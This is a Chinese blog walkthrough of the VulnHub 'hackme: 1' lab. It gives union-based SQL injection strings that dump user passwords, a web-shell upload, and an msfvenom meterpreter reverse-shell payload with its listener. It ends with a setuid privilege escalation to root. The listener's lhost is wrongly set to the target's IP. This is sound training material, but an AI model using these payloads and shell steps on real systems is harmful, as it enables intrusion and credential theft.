VulnHub-hackme:1漏洞利用流程

已于 2024-01-09 16:32:11 修改
阅读量185 收藏
点赞数
分类专栏: 靶机实操 文章标签: 网络安全 安全 web安全
于 2023-06-13 18:20:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76786857/article/details/131184894
版权

靶机地址

hackme: 1 ~ VulnHubhackme: 1, made by x4bx54. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/hackme-1,330/

靶机IP:192.168.245.131

测试机系统:kali、win10

测试机IP:192.168.245.129 

目录

0.环境搭建

1.信息收集

1.1主机发现

1.2端口扫描

1.3服务扫描

 1.4目录扫描

1.5访问目录扫描出的网站

2.漏洞探测

2.1查看是否存在sql注入

2.2sql注入

2.3登录superadmin

3.getshell

3.1上传一句话木马

3.2中国蚁剑连接

3.3上传木马文件

3.4监听

4.提权

4.1获取shell

4.2切换终端

4.3获取root权限

0.环境搭建

1.下载并导入靶机
打开vmware——文件—打开—hackme.ova—导入虚拟机

2.查看网络适配器
将靶机网络适配器改为NAT模式

3.启动靶机
点击 ▶靶机,开启成功

1.信息收集

1.1主机发现

netdiscover -r 192.168.245.0/24 

发现靶机IP:192.168.245.131

1.2端口扫描

 发现目标靶机22端口和80端口开启

1.3服务扫描

对22端口和80端口扫描

nmap -sV -sC -A 192.168.245.131 -p 22,80

 1.4目录扫描

扫描目标靶机的80端口目录

dirb http://192.168.245.131

 扫描结果:http://192.168.245.131/uploads/

1.5访问目录扫描出的网站

 访问http://192.168.245.131/uploads/

点击test.png,未发现有用信息

 

访问http://192.168.245.131

 

 需要登录或者注册,但并不知道用户名跟密码,所以可以先注册一个账户然后登录进去。

2.漏洞探测

2.1查看是否存在sql注入

登录进去之后有一个查询框,点击search出现所有信息

在查询框内输入:

OSINT’ and 1=1#

出现 

2.2sql注入

a.判断字段:输入:

OSINT' order by 3#

 出现:

 结果正常显示,输入:

OSINT' order by 4#

没有结果显示,说明字段数为3

 b.爆库:输入:

-1' union select database(),2,3#

查看当前数据库

 得到数据库名称为webapphacking 

c.爆表:输入:

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

 查看webapphacking中所有的表

 得到数据库中存在books表和users表;猜测users表包含账户信息 

d.爆列:输入:

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

 查看users表所有的列

e.爆数据:查看user列和pasword列内的数据输入:

-1' union select group_concat(user),group_concat(pasword),3 from users#

得到一系列用户名和密码 

在网站内破解superadmin的密码 

 得到其中一个密码为:Uncrackable

2.3登录superadmin

返回网站登录界面登录用户superadmin

登录以后进入以下页面

3.getshell

3.1上传一句话木马

网页内存在上传文件的地方,在此处上传一句话木马

提示上传成功并给出了文件上传的地址

3.2中国蚁剑连接

使用中国蚁剑连接刚刚上传的木马

 

3.3上传木马文件

kali里MSF生成木马文件 

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.245.131 lport=4444 -f elf >4444.elf

 

 然后将生成的木马文件复制到win10桌面上传到中国蚁剑

3.4监听

在kali里面设置监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.245.131  #目标靶机IP
set lport 4444             
explort

 然后在中国蚁剑木马文件的目录下打开终端,设置木马文件的权限并运行文件(如果没有设置权限就会出现下图第一次运行文件时的情况:提示权限不足)

chmod +x 4444.elf
./4444.elf

 返回kali,可以看到监听成功

4.提权

4.1获取shell

在meterpreter内执行指令:

shell
whoami  #显示用户

4.2切换终端

获取shell后切换到python终端

python -c 'import pty;pty.spawn("/bin/bash")'

4.3获取root权限

在home目录下发现文件touchmenot,切换到对应路径下,然后运行文件

cd /home/legacy
./touchmenot
id

可以看到提权成root用户

切换成root用户:

su root
id


最后提权成功

廾匸0705
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 5881
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme-1打靶记录
wwd180的博客
06-12 84
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
hackme-1靶机渗透详解
大熊
06-12 377
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
红队打靶练习:HACKME: 1
分享
12-18 416
红队打靶练习:HACKME: 1 , 犹如猛虎撕咬般的恐惧感.....
HACKME: 1实战演练
龙狼刺的博客
05-24 126
HACKME: 1
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
VulnHub靶场MONEYBOX:1
最新发布
01-05
VulnHub是一个提供各种...总之,VulnHub靶场MONEYBOX:1是一个非常实用的学习资源,可以帮助安全爱好者提高渗透测试和漏洞利用的技能。但是需要注意的是,靶场环境仅供学习和研究使用,不得用于非法入侵和攻击他人系统。
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
靶场-hackeme1
weixin_58602402的博客
06-12 120
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
Vulnhub--hackme1
weixin_45168704的博客
06-12 76
hackme1靶机渗透流程
hackme1新手教学
w2411313的博客
10-13 5762
15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。>,点击选择文件进行上传,然后点击upload image。12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking。
vulnhub靶机hackme(DHCP)渗透测试
Long_gone的博客
12-04 1264
一、扫描 靶机打开后先用攻击机扫描靶机的IP地址: arp-scan 192.168.34.0/24 经过排除,确定靶机IP地址为:192.168.34.154,然后扫描一下靶机的端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,然后再扫描一下80端口的目录: dirb http://192.168.34.154 ...
【靶机渗透】HACKME: 1
安全狐
07-19 881
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 883
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
Vulnhub-hackme2
GALi_233的博客
03-20 3884
Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is
HACKME:1靶机
JKding123的博客
10-22 874
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
Vulnhub靶机hackme: 1 writeup
xingjinhao123的博客
01-14 2175
下载地址:https://www.vulnhub.com/entry/hackme-1,330/ 信息搜集 获取IP地址 扫描端口 80端口 首页是一个登录页面 发现有注册页面,注册一个账号admin:password,并且登录成功 登录成功之后的页面,是一个查阅图书的页面 尝试使用SQL注入 sqlmap -r sqlmap.txt --batch sqlmap.txt里面的内容,通过抓包获取的 sqlmap.txt POST /welcome.php HTTP/1.1 Host:
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

廾匸0705

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值